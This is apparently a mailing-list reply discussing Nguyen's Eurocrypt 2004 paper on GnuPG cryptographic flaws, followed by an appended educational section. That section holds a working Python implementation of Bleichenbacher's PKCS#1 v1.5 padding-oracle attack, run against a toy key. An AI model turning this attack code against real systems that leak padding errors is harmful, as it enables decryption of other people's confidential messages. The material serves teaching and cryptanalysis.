Mike Markowitz wrote:
Folks:
Since Hal just pointed to an RSA Conference paper, I thought I'd bring attention
to an OpenPGP-related paper to be presented by Phong Nguyen at EuroCrypt in May.
A goodly post, although the paper worries
me somewhat on two points, the second of
which may be germane to OpenPGP, further
below.
The abstract sounds like old news, but perhaps list subscribers will be
interested anyway:
http://www.di.ens.fr/~pnguyen/pub.html#Ng04
Abstract: More and more software use cryptography. But how can one know if
what is implemented is good cryptography? For proprietary software, one
cannot say much unless one proceeds to reverse-engineering, and history
tends to show that bad cryptography is much more frequent than good
cryptography there. Open source software thus sounds like a good solution,
but the fact that a source code can be read does not imply that it is
actually read, especially by cryptography experts. In this paper, we
illustrate this point by
Having read the paper here:
ftp://ftp.di.ens.fr/pub/users/pnguyen/Eurocrypt04.ps
(at least the non-heavy-crypto parts), I
think the above half-abstract is unsupported,
and probably disproven by the existence of
the paper itself.
As the paper presents no information on
anything about "good/bad cryptography"
and/or "open source" and/or "proprietary
software" and/or "reverse engineering",
it seems an out-of-place comment?
(As is the first paragraph of the paper
proper.)
In essence, the existence of GPG as an
open source crypto system has permitted
the author to examine the software and
find some potentially useful flaws. That
would seem to be evidence to the contrary
of the point claimed above?
examining the case of a basic Internet application
of cryptography: secure email. We analyze parts of the source code of the
latest version of GNU Privacy Guard (GnuPG or GPG), a free open source
alternative to the famous PGP software, compliant with the OpenPGP standard,
and included in most GNU/Linux distributions such as Debian, MandrakeSoft,
Red Hat and SuSE. We observe several cryptographic flaws in GPG v1.2.3. The
most serious flaw has been present in GPG for almost four years: we show
that as soon as one (GPG-generated) ElGamal signature of an arbitrary
message is released, one can recover the signer's private key in less than a
second on a PC. As a consequence, ElGamal signatures and the so-called
ElGamal sign+encrypt keys have recently been removed from GPG. Fortunately,
ElGamal was not GPG's default option for signing keys.
This part and the paper proper look useful!
I recall the ElGamal signing keys are already
deprecated.
The paper also makes some comments concerning
OpenPGP weaknesses (sans exploits) of PKCS#1 v1.5
RSA encryption and signatures (section 4.2, 4.3).
4.2 Encryption
As already mentioned in Section 2, GPG implements
RSA encryption as defined by PKCS#1 v1.5. This is
not state-of-the-art cryptography: like with
ElGamal, Bleichenbacher's chosen-ciphertext attack [4]
can decrypt any ciphertext. But, as mentioned
in 3.3, the relevance of such attacks to the email
world is debatable, in part because of the high
number of oracle calls. We hope that future
versions of the OpenPGP standard will recommend
better RSA encryption standards (see for instance
PKCS#1 v2.1 [20] or NESSIE [8]).
Any comments?
Presumably it is way too late in the piece to
change these methods. My question here would be
more along the lines of whether a warning comment
should be placed in the draft document?
(Apologies for not proposing the text for that!)
iang
PS: definitely worth posting though.
[4] D. Bleichenbacher. Generating ElGamal signatures
without knowing the secret key. In _Proc. of Eurocrypt
'96_, volume 1070 of LNCS, pages 10-18. IACR, Springer-
Verlag, 1996.
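For readers who want to see what the quoted section 4.2 is worried about, here is a worked example of Bleichenbacher's CRYPTO '98 chosen-ciphertext attack on PKCS#1 v1.5 RSA encryption (the "can decrypt any ciphertext" attack the paper refers to), including a count of the oracle calls it needs. This is added example code, not GnuPG's code and not from Nguyen's paper. It assumes a toy key built from two well-known primes (2^61-1 and 2^64-59), an oracle that only reports whether a decryption starts with the bytes 00 02 (the classic "loose" oracle: in a real system this leak would be an error message, a timing difference or a protocol behaviour), and a genuine, already-conforming ciphertext so the blinding step can be skipped (s0 = 1). All function names (`toy_key`, `pkcs1_v15_encrypt`, `make_padding_oracle`, `bleichenbacher`, `demo`) are mine.

```python
# Bleichenbacher's CRYPTO '98 chosen-ciphertext attack on PKCS#1 v1.5 RSA
# encryption, run against a toy key. Added example; not GnuPG or the paper's code.
import random


def _ceil_div(a, b):
    return -(-a // b)

def toy_key(e=65537):
    """Toy RSA key from two known primes, 2^61-1 and 2^64-59 (~125-bit modulus):
    hopelessly small for real use, but the attack then runs in under a second."""
    p, q = (1 << 61) - 1, (1 << 64) - 59
    return {"n": p * q, "e": e, "d": pow(e, -1, (p - 1) * (q - 1)), "p": p, "q": q}

def byte_len(key):
    return (key["n"].bit_length() + 7) // 8

def pkcs1_v15_encrypt(msg, key, rng):
    """EME-PKCS1-v1_5: 00 02 || PS (>= 8 nonzero random bytes) || 00 || M."""
    ps_len = byte_len(key) - 3 - len(msg)
    if ps_len < 8:
        raise ValueError("message too long for this modulus")
    ps = bytes(rng.randrange(1, 256) for _ in range(ps_len))
    em = int.from_bytes(b"\x00\x02" + ps + b"\x00" + msg, "big")
    return pow(em, key["e"], key["n"])

def make_padding_oracle(key):
    """The leak: the decrypter reveals (via a distinguishable error, timing, ...)
    whether a ciphertext decrypts to something that starts with 00 02."""
    p, q, d, k = key["p"], key["q"], key["d"], byte_len(key)
    dp, dq, qinv = d % (p - 1), d % (q - 1), pow(q, -1, p)

    def oracle(c):
        m1, m2 = pow(c, dp, p), pow(c, dq, q)  # CRT decryption, as real code does
        m = m2 + ((m1 - m2) * qinv % p) * q
        return m.to_bytes(k, "big")[:2] == b"\x00\x02"
    return oracle

def bleichenbacher(c, key, oracle):
    """Recover the padded plaintext of c using only the oracle; returns
    (m, oracle_calls). c is a genuine ciphertext, hence already conforming,
    so the blinding step is skipped (s0 = 1)."""
    n, e = key["n"], key["e"]
    B = 1 << (8 * (byte_len(key) - 2))
    B2, B3, calls = 2 * B, 3 * B, 0

    def conforming(s):
        nonlocal calls
        calls += 1
        return oracle(c * pow(s, e, n) % n)

    s = _ceil_div(n, B3)  # step 2a: first s >= n/3B with m*s mod n conforming
    while not conforming(s):
        s += 1
    M = [(B2, B3 - 1)]
    while True:
        found = []  # step 3: shrink each (a, b) in M to the r-slices consistent with s
        for a, b in M:
            for r in range(_ceil_div(a * s - B3 + 1, n), (b * s - B2) // n + 1):
                lo, hi = max(a, _ceil_div(B2 + r * n, s)), min(b, (B3 - 1 + r * n) // s)
                if lo <= hi:
                    found.append((lo, hi))
        M = []
        for lo, hi in sorted(found):  # merge overlapping intervals
            if M and lo <= M[-1][1]:
                M[-1] = (M[-1][0], max(M[-1][1], hi))
            else:
                M.append((lo, hi))
        if len(M) == 1 and M[0][0] == M[0][1]:  # step 4: a single point is m
            return M[0][0], calls
        if len(M) > 1:  # step 2b: several intervals left, keep scanning s linearly
            s += 1
            while not conforming(s):
                s += 1
            continue
        a, b = M[0]  # step 2c: one interval, so jump r and scan a narrow s window
        r = _ceil_div(2 * (b * s - B2), n)
        while True:
            lo, hi = _ceil_div(B2 + r * n, b), (B3 - 1 + r * n) // a
            hit = next((t for t in range(lo, hi + 1) if conforming(t)), None)
            if hit is not None:
                s = hit
                break
            r += 1

def unpad(m, key):
    em = m.to_bytes(byte_len(key), "big")
    return em[em.index(b"\x00", 2) + 1:]

def demo(msg=b"hello", seed=7):
    """Encrypt msg, then recover it through the oracle alone (returns msg, calls)."""
    key = toy_key()
    c = pkcs1_v15_encrypt(msg, key, random.Random(seed))  # seeded only for repeatability
    m, calls = bleichenbacher(c, key, make_padding_oracle(key))
    return unpad(m, key), calls
```

`demo()` recovers the plaintext with only the yes/no answers of the oracle, and the second return value is the cost the quoted text calls the "high number of oracle calls": typically on the order of ten thousand queries for this toy key, and Bleichenbacher's own estimate for a real 1024-bit key was around a million (hence "million message attack"). That number is what makes the attack debatable against e-mail, where each query is a message a victim has to decrypt and react to, and it is exactly why PKCS#1 v2.1 (RSAES-OAEP), which the paper recommends, rejects tampered ciphertexts without leaking a usable padding bit.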